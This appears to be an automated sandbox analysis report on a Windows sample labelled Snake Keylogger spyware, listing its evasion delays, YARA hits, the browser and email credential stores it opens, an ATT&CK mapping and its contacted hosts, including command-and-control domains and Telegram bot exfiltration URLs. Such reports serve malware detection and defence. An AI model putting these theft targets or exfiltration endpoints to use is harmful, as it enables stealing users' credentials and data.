                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -599421s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -599312s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -599203s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -599093s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -598984s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -598875s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -598765s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -598656s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -598546s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -598437s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -598328s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -598218s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -598109s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -597996s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -597888s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -597741s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -597637s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -597531s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -597417s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -597312s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -597203s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -597093s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -596984s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -596875s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -596765s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -596656s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -596547s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -596437s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -596328s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -596217s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -596109s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -596000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -595890s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -595781s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -595672s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -595547s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -595437s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -595328s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -595218s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -595109s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -594993s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -594890s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -594781s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -594671s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364Thread sleep time: -594562s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 599765Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 599636Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 599531Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 599421Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 599312Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 599203Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 599093Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 598984Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 598875Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 598765Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 598656Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 598546Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 598437Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 598328Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 598218Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 598109Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 597996Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 597888Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 597741Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 597637Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 597531Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 597417Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 597312Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 597203Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 597093Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 596984Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 596875Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 596765Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 596656Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 596547Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 596437Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 596328Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 596217Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 596109Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 596000Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 595890Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 595781Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 595672Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 595547Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 595437Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 595328Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 595218Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 595109Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 594993Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 594890Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 594781Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 594671Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeThread delayed: delay time: 594562Jump to behavior
                          Source: z64BLPL.exe, 00000000.00000002.4120472413.0000000000DA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCult
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 0_2_066996C8 LdrInitializeThunk,0_2_066996C8
                          Source: C:\Users\user\Desktop\z64BLPL.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeQueries volume information: C:\Users\user\Desktop\z64BLPL.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: z64BLPL.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR
                          Source: Yara matchFile source: z64BLPL.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\z64BLPL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                          Source: C:\Users\user\Desktop\z64BLPL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                          Source: Yara matchFile source: z64BLPL.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: z64BLPL.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR
                          Source: Yara matchFile source: z64BLPL.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                          DLL Side-Loading
                          1
                          DLL Side-Loading
                          1
                          Disable or Modify Tools
                          1
                          OS Credential Dumping
                          1
                          Query Registry
                          Remote Services1
                          Email Collection
                          1
                          Web Service
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts31
                          Virtualization/Sandbox Evasion
                          LSASS Memory1
                          Security Software Discovery
                          Remote Desktop Protocol11
                          Archive Collected Data
                          11
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                          Deobfuscate/Decode Files or Information
                          Security Account Manager1
                          Process Discovery
                          SMB/Windows Admin Shares1
                          Data from Local System
                          3
                          Ingress Tool Transfer
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          Obfuscated Files or Information
                          NTDS31
                          Virtualization/Sandbox Evasion
                          Distributed Component Object ModelInput Capture3
                          Non-Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading
                          LSA Secrets1
                          Application Window Discovery
                          SSHKeylogging14
                          Application Layer Protocol
                          Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
                          System Network Configuration Discovery
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync13
                          System Information Discovery
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          z64BLPL.exe74%ReversingLabsByteCode-MSIL.Spyware.Snakekeylogger
                          z64BLPL.exe100%AviraHEUR/AGEN.1307591
                          z64BLPL.exe100%Joe Sandbox ML
                          No Antivirus matches
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://checkip.dyndns.org0%URL Reputationsafe
                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                          http://varders.kozow.com:80810%URL Reputationsafe
                          http://aborters.duckdns.org:8081100%URL Reputationmalware
                          http://checkip.dyndns.org/0%URL Reputationsafe
                          http://51.38.247.67:8081/_send_.php?L0%URL Reputationsafe
                          http://anotherarmy.dns.army:8081100%URL Reputationmalware
                          http://checkip.dyndns.org/q0%URL Reputationsafe
                          https://reallyfreegeoip.org0%URL Reputationsafe
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                          https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                          https://www.office.com/0%Avira URL Cloudsafe
                          https://reallyfreegeoip.org/xml/8.46.123.33$0%Avira URL Cloudsafe
                          https://www.office.com/lB0%Avira URL Cloudsafe
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
                          https://api.telegram.org/bot0%Avira URL Cloudsafe
                          https://api.telegram.org0%Avira URL Cloudsafe
                          https://reallyfreegeoip.org/xml/8.46.123.330%Avira URL Cloudsafe
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2029/09/2024%20/%2005:52:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                          https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20a0%Avira URL Cloudsafe
                          https://chrome.google.com/webstore?hl=enlB0%Avira URL Cloudsafe
                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%Avira URL Cloudsafe
                          http://mail.electradubai.com0%Avira URL Cloudsafe
                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%Avira URL Cloudsafe
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          mail.electradubai.com
                          192.250.231.25
                          truetrue
                            unknown
                            reallyfreegeoip.org
                            188.114.97.3
                            truetrue
                              unknown
                              api.telegram.org
                              149.154.167.220
                              truetrue
                                unknown
                                checkip.dyndns.com
                                193.122.6.168
                                truefalse
                                  unknown
                                  checkip.dyndns.org
                                  unknown
                                  unknowntrue
                                    unknown
                                    NameMaliciousAntivirus DetectionReputation
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2029/09/2024%20/%2005:52:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://reallyfreegeoip.org/xml/8.46.123.33false
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://checkip.dyndns.org/false
                                    • URL Reputation: safe
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://www.office.com/z64BLPL.exe, 00000000.00000002.4120925537.0000000002C06000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://api.telegram.orgz64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://api.telegram.org/botz64BLPL.exefalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.office.com/lBz64BLPL.exe, 00000000.00000002.4120925537.0000000002C01000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://checkip.dyndns.orgz64BLPL.exe, 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016z64BLPL.exe, 00000000.00000002.4122665440.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003DB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17z64BLPL.exe, 00000000.00000002.4122665440.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003DB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://chrome.google.com/webstore?hl=enz64BLPL.exe, 00000000.00000002.4120925537.0000000002BD5000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002C06000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://varders.kozow.com:8081z64BLPL.exefalse
                                    • URL Reputation: safe
                                    unknown
                                    http://aborters.duckdns.org:8081z64BLPL.exetrue
                                    • URL Reputation: malware
                                    unknown
                                    http://51.38.247.67:8081/_send_.php?Lz64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20az64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://reallyfreegeoip.org/xml/8.46.123.33$z64BLPL.exe, 00000000.00000002.4120925537.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002A8B000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://anotherarmy.dns.army:8081z64BLPL.exetrue
                                    • URL Reputation: malware
                                    unknown
                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installz64BLPL.exe, 00000000.00000002.4122665440.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://checkip.dyndns.org/qz64BLPL.exefalse
                                    • URL Reputation: safe
                                    unknown
                                    https://chrome.google.com/webstore?hl=enlBz64BLPL.exe, 00000000.00000002.4120925537.0000000002BD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://reallyfreegeoip.orgz64BLPL.exe, 00000000.00000002.4120925537.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002A60000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesz64BLPL.exe, 00000000.00000002.4122665440.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://mail.electradubai.comz64BLPL.exe, 00000000.00000002.4120925537.0000000002BA3000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
